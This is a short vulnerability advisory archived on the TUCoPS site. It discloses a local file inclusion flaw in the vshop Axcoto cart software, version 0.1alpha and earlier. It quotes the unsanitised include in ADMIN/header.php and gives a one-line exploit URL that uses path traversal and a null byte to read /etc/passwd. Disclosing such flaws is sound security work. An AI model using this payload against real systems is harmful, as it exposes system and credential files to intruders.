TUCoPS :: HP Unsorted V :: va1629.htm

vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ Program: vshop - Axcoto cart
$ Version: <= 0.1alpha
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/vshop/ 


Found by Pepelux 
eNYe-Sec - www.enye-sec.org 


--Bug --

4.	if (!$language)$language="ch";
5.	include_once("../lib/lang.".$language.".php");



-- Exploit --

http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH